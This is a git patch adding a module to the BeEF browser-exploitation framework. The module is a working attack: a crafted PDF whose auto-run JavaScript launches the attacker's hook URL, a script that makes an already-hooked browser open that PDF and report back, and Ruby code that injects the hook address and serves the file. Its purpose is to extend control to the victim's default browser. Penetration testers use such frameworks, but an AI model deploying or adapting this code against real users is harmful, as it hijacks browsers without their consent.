From c83ec8cf2972aadde60eb299b3302931f4d979d0 Mon Sep 17 00:00:00 2001
From: "a.m.saafan@gmail.com"
 <a.m.saafan@gmail.com@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Tue, 23 Aug 2011 09:56:57 +0000
Subject: [PATCH] Fixes for cross domain issues in the 'hook default' module
 and rename it. Fixes issue 419.

git-svn-id: https://beef.googlecode.com/svn/trunk@1228 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 modules/browser/hook_default/bounce_to_ie.pdf | 79 +++++++++++++++++++
 modules/browser/hook_default/command.js       | 22 ++++++
 modules/browser/hook_default/config.yaml      | 25 ++++++
 modules/browser/hook_default/module.rb        | 58 ++++++++++++++
 4 files changed, 184 insertions(+)
 create mode 100755 modules/browser/hook_default/bounce_to_ie.pdf
 create mode 100644 modules/browser/hook_default/command.js
 create mode 100644 modules/browser/hook_default/config.yaml
 create mode 100644 modules/browser/hook_default/module.rb

diff --git a/modules/browser/hook_default/bounce_to_ie.pdf b/modules/browser/hook_default/bounce_to_ie.pdf
new file mode 100755
index 000000000..f0230f9a8
--- /dev/null
+++ b/modules/browser/hook_default/bounce_to_ie.pdf
@@ -0,0 +1,79 @@
+%PDF-1.1
+1 0 obj
+<<
+	/Pages 3 0 R
+	/OpenAction 4 0 R
+	/Type /Catalog
+>>
+endobj
+2 0 obj
+<<
+	/Encoding /MacRomanEncoding
+	/Subtype /Type1
+	/BaseFont /Helvetica
+	/Type /Font
+	/Name /F1
+>>
+endobj
+3 0 obj
+<<
+	/Kids [ 5 0 R ]
+	/Type /Pages
+	/Count 1
+>>
+endobj
+4 0 obj
+<<
+	/S /JavaScript
+	/JS 6 0 R
+>>
+endobj
+5 0 obj
+<<
+	/MediaBox [ 0 0 795 842 ]
+	/Contents 7 0 R
+	/Parent 3 0 R
+	/Resources <<
+		/Font <<
+			/F1 2 0 R
+		>>
+		/ProcSet [ /PDF /Text ]
+	>>
+	/Type /Page
+>>
+endobj
+6 0 obj
+<<
+	/Length 1708
+>>stream
+app.launchURL("<hookURI>",true);	 
+endstream
+endobj
+7 0 obj
+<<
+	/Length 48
+>>stream
+BT
+
+ET
+endstream
+endobj
+xref
+0 8
+0000000000 65535 f
+0000000010 00000 n
+0000000087 00000 n
+0000000209 00000 n
+0000000278 00000 n
+0000000332 00000 n
+0000000513 00000 n
+0000002278 00000 n
+trailer
+<<
+	/Size 8
+	/ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ]
+	/Root 1 0 R
+>>
+startxref
+2381
+%%EOF
diff --git a/modules/browser/hook_default/command.js b/modules/browser/hook_default/command.js
new file mode 100644
index 000000000..683999892
--- /dev/null
+++ b/modules/browser/hook_default/command.js
@@ -0,0 +1,22 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	
+	var pdf_url =  'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
+	window.open( pdf_url, '_blank');
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
+});
diff --git a/modules/browser/hook_default/config.yaml b/modules/browser/hook_default/config.yaml
new file mode 100644
index 000000000..30afe8e51
--- /dev/null
+++ b/modules/browser/hook_default/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        hook_ie:
+            enable: true
+            category: "Browser"
+            name: "Hook Default Browser"
+            description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
+            authors: ["saafan"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/hook_default/module.rb b/modules/browser/hook_default/module.rb
new file mode 100644
index 000000000..a80072803
--- /dev/null
+++ b/modules/browser/hook_default/module.rb
@@ -0,0 +1,58 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+class Hook_ie < BeEF::Core::Command
+  
+  def pre_send
+    #Get the servers configurations.
+    configuration = BeEF::Core::Configuration.instance
+		
+		#The hook url to be replace the token in the original pdf file.
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+		
+		# A new pdf file containg the actual hook URI instead of the dummy token.
+		configured_hook_file = File.open("./modules/browser/hook_ie/bounce_to_ie_configured.pdf","w")
+		
+		# The original pdf file contains a token that will get replaced during the initialization with
+		# the actual hook URI of beef. Note that the hook URI is accessed via the DNS name.		
+		File.open('./modules/browser/hook_ie/bounce_to_ie.pdf',"r") { |original_hook_file|
+			original_hook_file.each_line { |line|				
+				# If the line includes the hook token, then replace it with the actual hook URI
+				if(line.include? '<hookURI>')
+					line = line.sub(/<hookURI>/, hook_uri)
+				end
+				#write the line to a new file
+				configured_hook_file.write(line)
+			}
+		}
+		
+		configured_hook_file.close()
+		
+		
+		#Bind the configured PDF file to the web server.
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_ie/bounce_to_ie_configured.pdf', '/report', 'pdf', -1); 
+    
+  end
+
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']          
+    
+    save content
+    #update_zombie!
+  end
+  
+end